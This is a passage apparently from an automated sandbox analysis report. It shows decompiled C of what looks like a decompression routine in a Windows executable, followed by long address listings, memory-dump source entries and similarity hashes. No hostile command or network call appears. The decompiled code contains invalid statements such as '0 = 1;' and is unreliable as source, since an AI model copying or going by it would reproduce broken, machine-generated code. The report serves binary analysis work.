                                                                                                                                    											__edi =  &(__esi[0x6e8]);
                                                                                                                                    											__eflags = __eax - __edi;
                                                                                                                                    											if(__eax == __edi) {
                                                                                                                                    												goto L38;
                                                                                                                                    											}
                                                                                                                                    											L34:
                                                                                                                                    											__edx = __edi;
                                                                                                                                    											__eflags = __edx - __eax;
                                                                                                                                    											 *(__ebp - 0x30) = __edx;
                                                                                                                                    											if(__edx >= __eax) {
                                                                                                                                    												__ecx = __ecx - __edx;
                                                                                                                                    												__eflags = __ecx;
                                                                                                                                    												__eax = __ecx;
                                                                                                                                    											} else {
                                                                                                                                    												__eax = __eax - __edx;
                                                                                                                                    												__eax = __eax - 1;
                                                                                                                                    											}
                                                                                                                                    											__eflags = __eax;
                                                                                                                                    											 *(__ebp - 0x2c) = __eax;
                                                                                                                                    											if(__eax != 0) {
                                                                                                                                    												goto L48;
                                                                                                                                    											} else {
                                                                                                                                    												goto L38;
                                                                                                                                    											}
                                                                                                                                    										case 0xb:
                                                                                                                                    											goto L56;
                                                                                                                                    										case 0xc:
                                                                                                                                    											L60:
                                                                                                                                    											__esi[1] = __esi[1] >> 0xa;
                                                                                                                                    											__eax = (__esi[1] >> 0xa) + 4;
                                                                                                                                    											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                                                                    												goto L68;
                                                                                                                                    											}
                                                                                                                                    											goto L61;
                                                                                                                                    										case 0xd:
                                                                                                                                    											while(1) {
                                                                                                                                    												L93:
                                                                                                                                    												__eax = __esi[1];
                                                                                                                                    												__ecx = __esi[2];
                                                                                                                                    												__edx = __eax;
                                                                                                                                    												__eax = __eax & 0x0000001f;
                                                                                                                                    												__edx = __edx >> 5;
                                                                                                                                    												__eax = __edx + __eax + 0x102;
                                                                                                                                    												__eflags = __esi[2] - __eax;
                                                                                                                                    												if(__esi[2] >= __eax) {
                                                                                                                                    													break;
                                                                                                                                    												}
                                                                                                                                    												L73:
                                                                                                                                    												__eax = __esi[0x143];
                                                                                                                                    												while(1) {
                                                                                                                                    													L76:
                                                                                                                                    													__eflags = __ebx - __eax;
                                                                                                                                    													if(__ebx >= __eax) {
                                                                                                                                    														break;
                                                                                                                                    													}
                                                                                                                                    													L74:
                                                                                                                                    													__eflags =  *(__ebp - 0x34);
                                                                                                                                    													if( *(__ebp - 0x34) == 0) {
                                                                                                                                    														goto L182;
                                                                                                                                    													}
                                                                                                                                    													L75:
                                                                                                                                    													__ecx =  *(__ebp - 0x38);
                                                                                                                                    													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                    													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                                    													__ecx = __ebx;
                                                                                                                                    													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                    													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                    													__ebx = __ebx + 8;
                                                                                                                                    													__eflags = __ebx;
                                                                                                                                    												}
                                                                                                                                    												L77:
                                                                                                                                    												__eax =  *(0x40a400 + __eax * 2) & 0x0000ffff;
                                                                                                                                    												__eax = __eax &  *(__ebp - 0x40);
                                                                                                                                    												__ecx = __esi[0x144];
                                                                                                                                    												__eax = __esi[0x144] + __eax * 4;
                                                                                                                                    												__edx =  *(__eax + 1) & 0x000000ff;
                                                                                                                                    												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                                                                                    												__eflags = __eax - 0x10;
                                                                                                                                    												 *(__ebp - 0x14) = __eax;
                                                                                                                                    												if(__eax >= 0x10) {
                                                                                                                                    													L79:
                                                                                                                                    													__eflags = __eax - 0x12;
                                                                                                                                    													if(__eax != 0x12) {
                                                                                                                                    														__eax = __eax + 0xfffffff2;
                                                                                                                                    														 *(__ebp - 8) = 3;
                                                                                                                                    													} else {
                                                                                                                                    														_push(7);
                                                                                                                                    														 *(__ebp - 8) = 0xb;
                                                                                                                                    														_pop(__eax);
                                                                                                                                    													}
                                                                                                                                    													while(1) {
                                                                                                                                    														L84:
                                                                                                                                    														__ecx = __eax + __edx;
                                                                                                                                    														__eflags = __ebx - __eax + __edx;
                                                                                                                                    														if(__ebx >= __eax + __edx) {
                                                                                                                                    															break;
                                                                                                                                    														}
                                                                                                                                    														L82:
                                                                                                                                    														__eflags =  *(__ebp - 0x34);
                                                                                                                                    														if( *(__ebp - 0x34) == 0) {
                                                                                                                                    															goto L182;
                                                                                                                                    														}
                                                                                                                                    														L83:
                                                                                                                                    														__ecx =  *(__ebp - 0x38);
                                                                                                                                    														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                    														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                                    														__ecx = __ebx;
                                                                                                                                    														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                    														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                    														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                    														__ebx = __ebx + 8;
                                                                                                                                    														__eflags = __ebx;
                                                                                                                                    													}
                                                                                                                                    													L85:
                                                                                                                                    													__ecx = __edx;
                                                                                                                                    													__ebx = __ebx - __edx;
                                                                                                                                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                                    													 *(0x40a400 + __eax * 2) & 0x0000ffff =  *(0x40a400 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                                                                    													__edx =  *(__ebp - 8);
                                                                                                                                    													__ebx = __ebx - __eax;
                                                                                                                                    													__edx =  *(__ebp - 8) + ( *(0x40a400 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                                                                    													__ecx = __eax;
                                                                                                                                    													__eax = __esi[1];
                                                                                                                                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                                    													__ecx = __esi[2];
                                                                                                                                    													__eax = __eax >> 5;
                                                                                                                                    													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                                                                                    													__eax = __eax & 0x0000001f;
                                                                                                                                    													__eax = __edi + __eax + 0x102;
                                                                                                                                    													__edi = __edx + __ecx;
                                                                                                                                    													__eflags = __edx + __ecx - __eax;
                                                                                                                                    													if(__edx + __ecx > __eax) {
                                                                                                                                    														goto L9;
                                                                                                                                    													}
                                                                                                                                    													L86:
                                                                                                                                    													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                                                                                    													if( *(__ebp - 0x14) != 0x10) {
                                                                                                                                    														L89:
                                                                                                                                    														__edi = 0;
                                                                                                                                    														__eflags = 0;
                                                                                                                                    														L90:
                                                                                                                                    														__eax = __esi + 0xc + __ecx * 4;
                                                                                                                                    														do {
                                                                                                                                    															L91:
                                                                                                                                    															 *__eax = __edi;
                                                                                                                                    															__ecx = __ecx + 1;
                                                                                                                                    															__eax = __eax + 4;
                                                                                                                                    															__edx = __edx - 1;
                                                                                                                                    															__eflags = __edx;
                                                                                                                                    														} while (__edx != 0);
                                                                                                                                    														__esi[2] = __ecx;
                                                                                                                                    														continue;
                                                                                                                                    													}
                                                                                                                                    													L87:
                                                                                                                                    													__eflags = __ecx - 1;
                                                                                                                                    													if(__ecx < 1) {
                                                                                                                                    														goto L9;
                                                                                                                                    													}
                                                                                                                                    													L88:
                                                                                                                                    													__edi =  *(__esi + 8 + __ecx * 4);
                                                                                                                                    													goto L90;
                                                                                                                                    												}
                                                                                                                                    												L78:
                                                                                                                                    												__ecx = __edx;
                                                                                                                                    												__ebx = __ebx - __edx;
                                                                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                                    												__ecx = __esi[2];
                                                                                                                                    												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                                                                                    												__esi[2] = __esi[2] + 1;
                                                                                                                                    											}
                                                                                                                                    											L94:
                                                                                                                                    											__eax = __esi[1];
                                                                                                                                    											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                                                                                    											__edi = __eax;
                                                                                                                                    											__eax = __eax >> 5;
                                                                                                                                    											__edi = __edi & 0x0000001f;
                                                                                                                                    											__ecx = 0x101;
                                                                                                                                    											__eax = __eax & 0x0000001f;
                                                                                                                                    											__edi = __edi + 0x101;
                                                                                                                                    											__eax = __eax + 1;
                                                                                                                                    											__edx = __ebp - 0xc;
                                                                                                                                    											 *(__ebp - 0x14) = __eax;
                                                                                                                                    											 &(__esi[0x148]) = __ebp - 4;
                                                                                                                                    											 *(__ebp - 4) = 9;
                                                                                                                                    											__ebp - 0x18 =  &(__esi[3]);
                                                                                                                                    											 *(__ebp - 0x10) = 6;
                                                                                                                                    											__eax = E0040711A( &(__esi[3]), __edi, 0x101, 0x408414, 0x408454, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                                                                                    											__eflags =  *(__ebp - 4);
                                                                                                                                    											if( *(__ebp - 4) == 0) {
                                                                                                                                    												__eax = __eax | 0xffffffff;
                                                                                                                                    												__eflags = __eax;
                                                                                                                                    											}
                                                                                                                                    											__eflags = __eax;
                                                                                                                                    											if(__eax != 0) {
                                                                                                                                    												goto L9;
                                                                                                                                    											} else {
                                                                                                                                    												L97:
                                                                                                                                    												__ebp - 0xc =  &(__esi[0x148]);
                                                                                                                                    												__ebp - 0x10 = __ebp - 0x1c;
                                                                                                                                    												__eax = __esi + 0xc + __edi * 4;
                                                                                                                                    												__eax = E0040711A(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408494, 0x4084d0, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                                                                                    												__eflags = __eax;
                                                                                                                                    												if(__eax != 0) {
                                                                                                                                    													goto L9;
                                                                                                                                    												}
                                                                                                                                    												L98:
                                                                                                                                    												__eax =  *(__ebp - 0x10);
                                                                                                                                    												__eflags =  *(__ebp - 0x10);
                                                                                                                                    												if( *(__ebp - 0x10) != 0) {
                                                                                                                                    													L100:
                                                                                                                                    													__cl =  *(__ebp - 4);
                                                                                                                                    													 *__esi =  *__esi & 0x00000000;
                                                                                                                                    													__eflags =  *__esi;
                                                                                                                                    													__esi[4] = __al;
                                                                                                                                    													__eax =  *(__ebp - 0x18);
                                                                                                                                    													__esi[5] =  *(__ebp - 0x18);
                                                                                                                                    													__eax =  *(__ebp - 0x1c);
                                                                                                                                    													__esi[4] = __cl;
                                                                                                                                    													__esi[6] =  *(__ebp - 0x1c);
                                                                                                                                    													goto L101;
                                                                                                                                    												}
                                                                                                                                    												L99:
                                                                                                                                    												__eflags = __edi - 0x101;
                                                                                                                                    												if(__edi > 0x101) {
                                                                                                                                    													goto L9;
                                                                                                                                    												}
                                                                                                                                    												goto L100;
                                                                                                                                    											}
                                                                                                                                    										case 0xe:
                                                                                                                                    											goto L9;
                                                                                                                                    										case 0xf:
                                                                                                                                    											L175:
                                                                                                                                    											__eax =  *(__ebp - 0x30);
                                                                                                                                    											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                                                                                    											__eax = E004070B2( *((intOrPtr*)(__ebp + 8)));
                                                                                                                                    											__ecx = __esi[0x26ea];
                                                                                                                                    											__edx = __esi[0x26e9];
                                                                                                                                    											__eflags = __ecx - __edx;
                                                                                                                                    											 *(__ebp - 0x30) = __ecx;
                                                                                                                                    											if(__ecx >= __edx) {
                                                                                                                                    												__eax = __esi[0x26e8];
                                                                                                                                    												__eax = __esi[0x26e8] - __ecx;
                                                                                                                                    												__eflags = __eax;
                                                                                                                                    											} else {
                                                                                                                                    												__edx = __edx - __ecx;
                                                                                                                                    												__eax = __edx - __ecx - 1;
                                                                                                                                    											}
                                                                                                                                    											__eflags = __ecx - __edx;
                                                                                                                                    											 *(__ebp - 0x2c) = __eax;
                                                                                                                                    											if(__ecx != __edx) {
                                                                                                                                    												L183:
                                                                                                                                    												__edi = 0;
                                                                                                                                    												goto L10;
                                                                                                                                    											} else {
                                                                                                                                    												L179:
                                                                                                                                    												__eax = __esi[0x145];
                                                                                                                                    												__eflags = __eax - 8;
                                                                                                                                    												 *__esi = __eax;
                                                                                                                                    												if(__eax != 8) {
                                                                                                                                    													L184:
                                                                                                                                    													0 = 1;
                                                                                                                                    													goto L10;
                                                                                                                                    												}
                                                                                                                                    												goto L180;
                                                                                                                                    											}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								L181:
                                                                                                                                    								goto L9;
                                                                                                                                    							}
                                                                                                                                    							L70:
                                                                                                                                    							if( *__edi == __eax) {
                                                                                                                                    								goto L72;
                                                                                                                                    							}
                                                                                                                                    							L71:
                                                                                                                                    							__esi[2] = __esi[2] & __eax;
                                                                                                                                    							 *__esi = 0xd;
                                                                                                                                    							goto L93;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				L182:
                                                                                                                                    				_t443 = 0;
                                                                                                                                    				_t446[0x147] =  *(_t448 - 0x40);
                                                                                                                                    				_t446[0x146] = _t425;
                                                                                                                                    				( *(_t448 + 8))[1] = 0;
                                                                                                                                    				goto L11;
                                                                                                                                    			}









                                                                                                                                    0x00406a3b
                                                                                                                                    0x00406a41
                                                                                                                                    0x00406a47
                                                                                                                                    0x00406a4d
                                                                                                                                    0x00406a54
                                                                                                                                    0x00406a68
                                                                                                                                    0x00406a68
                                                                                                                                    0x00407037
                                                                                                                                    0x00407037
                                                                                                                                    0x00407037
                                                                                                                                    0x0040703c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406674
                                                                                                                                    0x00406674
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c6f
                                                                                                                                    0x00406c6f
                                                                                                                                    0x00406c73
                                                                                                                                    0x00406c76
                                                                                                                                    0x00406c79
                                                                                                                                    0x00406c7c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c82
                                                                                                                                    0x00406c82
                                                                                                                                    0x00406ca7
                                                                                                                                    0x00406ca7
                                                                                                                                    0x00406ca7
                                                                                                                                    0x00406ca9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c87
                                                                                                                                    0x00406c87
                                                                                                                                    0x00406c8b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c91
                                                                                                                                    0x00406c91
                                                                                                                                    0x00406c94
                                                                                                                                    0x00406c97
                                                                                                                                    0x00406c9a
                                                                                                                                    0x00406c9c
                                                                                                                                    0x00406c9e
                                                                                                                                    0x00406ca1
                                                                                                                                    0x00406ca4
                                                                                                                                    0x00406ca4
                                                                                                                                    0x00406ca4
                                                                                                                                    0x00406cab
                                                                                                                                    0x00406cab
                                                                                                                                    0x00406cb3
                                                                                                                                    0x00406cb6
                                                                                                                                    0x00406cb9
                                                                                                                                    0x00406cbc
                                                                                                                                    0x00406cc0
                                                                                                                                    0x00406cc3
                                                                                                                                    0x00406cc5
                                                                                                                                    0x00406cc8
                                                                                                                                    0x00406cca
                                                                                                                                    0x00406cde
                                                                                                                                    0x00406cde
                                                                                                                                    0x00406ce1
                                                                                                                                    0x00406cfb
                                                                                                                                    0x00406cfb
                                                                                                                                    0x00406cfe
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d04
                                                                                                                                    0x00406d04
                                                                                                                                    0x00406d07
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d0d
                                                                                                                                    0x00406d0d
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d0d
                                                                                                                                    0x00406ce3
                                                                                                                                    0x00406ce6
                                                                                                                                    0x00406ced
                                                                                                                                    0x00406cf0
                                                                                                                                    0x00000000
                                                                                                                                    0x00406cf0
                                                                                                                                    0x00406ccc
                                                                                                                                    0x00406cd0
                                                                                                                                    0x00406cd3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d18
                                                                                                                                    0x00406d18
                                                                                                                                    0x00406d3d
                                                                                                                                    0x00406d3d
                                                                                                                                    0x00406d3d
                                                                                                                                    0x00406d3f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d1d
                                                                                                                                    0x00406d1d
                                                                                                                                    0x00406d21
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d27
                                                                                                                                    0x00406d27
                                                                                                                                    0x00406d2a
                                                                                                                                    0x00406d2d
                                                                                                                                    0x00406d30
                                                                                                                                    0x00406d32
                                                                                                                                    0x00406d34
                                                                                                                                    0x00406d37
                                                                                                                                    0x00406d3a
                                                                                                                                    0x00406d3a
                                                                                                                                    0x00406d3a
                                                                                                                                    0x00406d41
                                                                                                                                    0x00406d49
                                                                                                                                    0x00406d4c
                                                                                                                                    0x00406d4f
                                                                                                                                    0x00406d51
                                                                                                                                    0x00406d54
                                                                                                                                    0x00406d54
                                                                                                                                    0x00406d56
                                                                                                                                    0x00406d5a
                                                                                                                                    0x00406d5d
                                                                                                                                    0x00406d60
                                                                                                                                    0x00406d63
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d69
                                                                                                                                    0x00406d69
                                                                                                                                    0x00406d8e
                                                                                                                                    0x00406d8e
                                                                                                                                    0x00406d8e
                                                                                                                                    0x00406d90
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d6e
                                                                                                                                    0x00406d6e
                                                                                                                                    0x00406d72
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d78
                                                                                                                                    0x00406d78
                                                                                                                                    0x00406d7b
                                                                                                                                    0x00406d7e
                                                                                                                                    0x00406d81
                                                                                                                                    0x00406d83
                                                                                                                                    0x00406d85
                                                                                                                                    0x00406d88
                                                                                                                                    0x00406d8b
                                                                                                                                    0x00406d8b
                                                                                                                                    0x00406d8b
                                                                                                                                    0x00406d92
                                                                                                                                    0x00406d92
                                                                                                                                    0x00406d9a
                                                                                                                                    0x00406d9d
                                                                                                                                    0x00406da0
                                                                                                                                    0x00406da3
                                                                                                                                    0x00406da7
                                                                                                                                    0x00406daa
                                                                                                                                    0x00406dac
                                                                                                                                    0x00406daf
                                                                                                                                    0x00406db2
                                                                                                                                    0x00406dcc
                                                                                                                                    0x00406dcc
                                                                                                                                    0x00406dcf
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406dd5
                                                                                                                                    0x00406dd5
                                                                                                                                    0x00406dd8
                                                                                                                                    0x00406ddf
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ddf
                                                                                                                                    0x00406db4
                                                                                                                                    0x00406db7
                                                                                                                                    0x00406dbe
                                                                                                                                    0x00406dc1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406de7
                                                                                                                                    0x00406de7
                                                                                                                                    0x00406e0c
                                                                                                                                    0x00406e0c
                                                                                                                                    0x00406e0c
                                                                                                                                    0x00406e0e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406dec
                                                                                                                                    0x00406dec
                                                                                                                                    0x00406df0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406df6
                                                                                                                                    0x00406df6
                                                                                                                                    0x00406df9
                                                                                                                                    0x00406dfc
                                                                                                                                    0x00406dff
                                                                                                                                    0x00406e01
                                                                                                                                    0x004066cd
                                                                                                                                    0x004066ce
                                                                                                                                    0x00406726
                                                                                                                                    0x00406726
                                                                                                                                    0x0040672d
                                                                                                                                    0x004067d3
                                                                                                                                    0x004067d3
                                                                                                                                    0x004067d8
                                                                                                                                    0x004067db
                                                                                                                                    0x004067e0
                                                                                                                                    0x004067e3
                                                                                                                                    0x004067e8
                                                                                                                                    0x004067eb
                                                                                                                                    0x004067f0
                                                                                                                                    0x004067f3
                                                                                                                                    0x004067f3
                                                                                                                                    0x00000000
                                                                                                                                    0x00406733
                                                                                                                                    0x00406733
                                                                                                                                    0x00406733
                                                                                                                                    0x00406733
                                                                                                                                    0x00406737
                                                                                                                                    0x00406737
                                                                                                                                    0x00406759
                                                                                                                                    0x0040675c
                                                                                                                                    0x0040675e
                                                                                                                                    0x00406761
                                                                                                                                    0x00406766
                                                                                                                                    0x0040673c
                                                                                                                                    0x0040673c
                                                                                                                                    0x00406741
                                                                                                                                    0x00406743
                                                                                                                                    0x00406745
                                                                                                                                    0x0040674a
                                                                                                                                    0x00406750
                                                                                                                                    0x00406755
                                                                                                                                    0x00406757
                                                                                                                                    0x00406757
                                                                                                                                    0x0040674c
                                                                                                                                    0x0040674c
                                                                                                                                    0x0040674c
                                                                                                                                    0x0040674a
                                                                                                                                    0x00000000
                                                                                                                                    0x00406768
                                                                                                                                    0x00406795
                                                                                                                                    0x0040679a
                                                                                                                                    0x0040679c
                                                                                                                                    0x0040679d
                                                                                                                                    0x0040679f
                                                                                                                                    0x004067a0
                                                                                                                                    0x004067a0
                                                                                                                                    0x004067a0
                                                                                                                                    0x004067c8
                                                                                                                                    0x004067cd
                                                                                                                                    0x004067cd
                                                                                                                                    0x00000000
                                                                                                                                    0x004067cd
                                                                                                                                    0x00406766
                                                                                                                                    0x0040672d
                                                                                                                                    0x004066d0
                                                                                                                                    0x004066d0
                                                                                                                                    0x004066d1
                                                                                                                                    0x0040671b
                                                                                                                                    0x00000000
                                                                                                                                    0x0040671b
                                                                                                                                    0x004066d3
                                                                                                                                    0x004066d4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406830
                                                                                                                                    0x00406830
                                                                                                                                    0x00406830
                                                                                                                                    0x00406833
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406810
                                                                                                                                    0x00406810
                                                                                                                                    0x00406814
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040681a
                                                                                                                                    0x0040681a
                                                                                                                                    0x0040681d
                                                                                                                                    0x00406820
                                                                                                                                    0x00406825
                                                                                                                                    0x00406827
                                                                                                                                    0x0040682a
                                                                                                                                    0x0040682d
                                                                                                                                    0x0040682d
                                                                                                                                    0x0040682d
                                                                                                                                    0x00406835
                                                                                                                                    0x00406835
                                                                                                                                    0x00406838
                                                                                                                                    0x0040683a
                                                                                                                                    0x0040683f
                                                                                                                                    0x00406842
                                                                                                                                    0x00406844
                                                                                                                                    0x00406847
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040684d
                                                                                                                                    0x0040684d
                                                                                                                                    0x0040684f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406855
                                                                                                                                    0x00406855
                                                                                                                                    0x00406859
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040685f
                                                                                                                                    0x0040685f
                                                                                                                                    0x00406862
                                                                                                                                    0x00406864
                                                                                                                                    0x00406902
                                                                                                                                    0x00406902
                                                                                                                                    0x00406905
                                                                                                                                    0x00406907
                                                                                                                                    0x00406907
                                                                                                                                    0x0040690a
                                                                                                                                    0x0040690d
                                                                                                                                    0x0040690f
                                                                                                                                    0x00406911
                                                                                                                                    0x00406913
                                                                                                                                    0x00406913
                                                                                                                                    0x0040691c
                                                                                                                                    0x00406921
                                                                                                                                    0x00406924
                                                                                                                                    0x00406927
                                                                                                                                    0x0040692a
                                                                                                                                    0x0040692d
                                                                                                                                    0x0040692d
                                                                                                                                    0x0040692d
                                                                                                                                    0x00406930
                                                                                                                                    0x00406936
                                                                                                                                    0x00406936
                                                                                                                                    0x0040693c
                                                                                                                                    0x0040693c
                                                                                                                                    0x0040693c
                                                                                                                                    0x00000000
                                                                                                                                    0x00406930
                                                                                                                                    0x0040686a
                                                                                                                                    0x0040686a
                                                                                                                                    0x00406870
                                                                                                                                    0x00406873
                                                                                                                                    0x00406875
                                                                                                                                    0x004068a0
                                                                                                                                    0x004068a3
                                                                                                                                    0x004068a9
                                                                                                                                    0x004068ae
                                                                                                                                    0x004068b4
                                                                                                                                    0x004068ba
                                                                                                                                    0x004068bc
                                                                                                                                    0x004068bf
                                                                                                                                    0x004068c8
                                                                                                                                    0x004068ce
                                                                                                                                    0x004068ce
                                                                                                                                    0x004068c1
                                                                                                                                    0x004068c3
                                                                                                                                    0x004068c5
                                                                                                                                    0x004068c5
                                                                                                                                    0x004068d0
                                                                                                                                    0x004068d6
                                                                                                                                    0x004068d9
                                                                                                                                    0x004068db
                                                                                                                                    0x004068dd
                                                                                                                                    0x004068e3
                                                                                                                                    0x004068e5
                                                                                                                                    0x004068e7
                                                                                                                                    0x004068ea
                                                                                                                                    0x004068f3
                                                                                                                                    0x004068f3
                                                                                                                                    0x004068f5
                                                                                                                                    0x004068ec
                                                                                                                                    0x004068ec
                                                                                                                                    0x004068ef
                                                                                                                                    0x004068ef
                                                                                                                                    0x004068f7
                                                                                                                                    0x004068f7
                                                                                                                                    0x004068e5
                                                                                                                                    0x004068fa
                                                                                                                                    0x004068fc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004068fc
                                                                                                                                    0x00406877
                                                                                                                                    0x00406877
                                                                                                                                    0x0040687d
                                                                                                                                    0x00406883
                                                                                                                                    0x00406885
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040702a
                                                                                                                                    0x00407030
                                                                                                                                    0x00407033
                                                                                                                                    0x00407035
                                                                                                                                    0x0040706a
                                                                                                                                    0x0040706c
                                                                                                                                    0x00000000
                                                                                                                                    0x0040706c
                                                                                                                                    0x00000000
                                                                                                                                    0x00407035
                                                                                                                                    0x00000000
                                                                                                                                    0x00406674
                                                                                                                                    0x00407042
                                                                                                                                    0x00000000
                                                                                                                                    0x00407042
                                                                                                                                    0x00406a56
                                                                                                                                    0x00406a58
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406a5a
                                                                                                                                    0x00406a5a
                                                                                                                                    0x00406a5d
                                                                                                                                    0x00000000
                                                                                                                                    0x00406a5d
                                                                                                                                    0x004069a2
                                                                                                                                    0x00406963
                                                                                                                                    0x00407047
                                                                                                                                    0x0040704a
                                                                                                                                    0x0040704c
                                                                                                                                    0x00407055
                                                                                                                                    0x0040705b
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • Opcode ID: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                                                                                                                                    • Instruction ID: cc79d415adf411fdcc3bed69cd8bbc2d74706c3cee3558b75ad944e4f2dff780
                                                                                                                                    • Opcode Fuzzy Hash: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                                                                                                                                    • Instruction Fuzzy Hash: F5E19B71904709CFDB24CF98C880BAAB7F5FB44305F15852EE497A7291E378AA91CF14
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040711A(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				unsigned int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				intOrPtr _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				intOrPtr* _v32;
                                                                                                                                    				signed int* _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				intOrPtr _v48;
                                                                                                                                    				intOrPtr _v52;
                                                                                                                                    				void _v116;
                                                                                                                                    				signed int _v176;
                                                                                                                                    				signed int _v180;
                                                                                                                                    				signed int _v240;
                                                                                                                                    				signed int _t166;
                                                                                                                                    				signed int _t168;
                                                                                                                                    				intOrPtr _t175;
                                                                                                                                    				signed int _t181;
                                                                                                                                    				void* _t182;
                                                                                                                                    				intOrPtr _t183;
                                                                                                                                    				signed int* _t184;
                                                                                                                                    				signed int _t186;
                                                                                                                                    				signed int _t187;
                                                                                                                                    				signed int* _t189;
                                                                                                                                    				signed int _t190;
                                                                                                                                    				intOrPtr* _t191;
                                                                                                                                    				intOrPtr _t192;
                                                                                                                                    				signed int _t193;
                                                                                                                                    				signed int _t195;
                                                                                                                                    				signed int _t200;
                                                                                                                                    				signed int _t205;
                                                                                                                                    				void* _t207;
                                                                                                                                    				short _t208;
